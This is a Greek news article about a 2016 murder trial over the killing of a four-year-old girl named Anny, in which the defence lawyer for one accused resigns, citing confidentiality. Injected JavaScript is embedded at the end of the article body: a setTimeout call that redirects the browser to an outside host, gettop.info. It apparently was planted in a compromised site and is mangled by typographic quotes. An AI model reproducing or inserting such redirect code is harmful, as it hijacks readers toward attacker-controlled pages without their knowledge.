Διεκόπη η δίκη για τη δολοφονία της Άννυ – Παραιτήθηκε αιφνιδιαστικά η δικηγόρος του Νίκι

0
19

 

Εμπλοκή στη δίκη για την υπόθεση της δολοφονίας της 4χρονης Άννυ, το περασμένο Πάσχα, καθώς η δικηγόρος του ενός εκ των κατηγορουμένων, Νασίχ Αχμέντοφ ή αλλιώς Νίκι, παραιτήθηκε από την υπεράσπιση του κατηγορουμένου.

Ειδικότερα, η δικηγόρος του Νίκι, Ιωάννα Παναγοπούλου δήλωσε στο δικαστήριο ότι αδυνατεί να υπερασπιστεί τον συγκεκριμένο κατηγορούμενο για λόγους που όπως είπε, δεν της επιτρέπεται να αποκαλύψει από το δικηγορικό απόρρητο.

Σε δήλωση που διάβασε στο δικαστήριο η δικηγόρος, ανέφερε:

«Ο Nazif Ahmedov κατηγορούμενος για τα ποινικά αδικήματα τς ανθρωποκτονίας από πρόθεση από κοινού σε ήρεμη ψυχική κατάσταση, της περιύβρισης νεκρού από κοινού και της παράνομης οπλοχρησίας με επέλεξε ως συνήγορο υπερασπίσεως του για να τον εκπροσωπήσω στην ποινική υπόθεση από τη στιγμή που εξεδόθη στη χώρα μας και για να τον υπερασπιστώ στη ποινική δίκη η οποία ξεκίνησε ενώπιον του ακροατηρίου του ΜΟΔ Αθηνών τη Δεύτερα 5.9.2016.

Έπειτα από δυο συνεδριάσεις σήμερα δια της παρούσης δηλώνω με σεβασμό στη Δικαιοσύνη την οποία υπηρετώ, ότι έπειτα από τη χθεσινή μου επίσκεψη στον Nazif Ahmedov στις φυλακές Κορυδαλλού και κατόπιν επικοινωνίας μαζί του και τη σύμφωνη γνώμη του, η προσωπική μου και επαγγελματική αξιοπρέπεια μου επιβάλλει να παραιτηθώ από τη θέση της συνηγόρου υπερασπίσεως του Nazif Ahmedov. To δικηγορικό απόρρητο της σχέσεως δικηγόρου και εντολέως, το οποίο επιβάλλει ο Κώδικας Δικηγόρων, δεν μου επιτρέπει να δημοσιοποιήσω τους λόγους της παραίτησής μου».

Στη συνέχεια η δικηγόρος αποχώρησε από τη δικαστική αίθουσα αποχαιρετώντας τον πρώην εντολέα της με ένα φιλί.

Από την πλευρά του ο κατηγορούμενος δήλωσε στο Μικτό Ορκωτό Δικαστήριο, δήλωσε ότι δεν επιθυμεί να εκπροσωπηθεί από κάποιο δικηγόρο. Ωστόσο, το δικαστήριο προχώρησε σε διορισμό νέου συνηγόρου για την υπεράσπιση του κατηγορουμένου.

Η δίκη θα συνεχιστεί την ερχόμενη Παρασκευή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here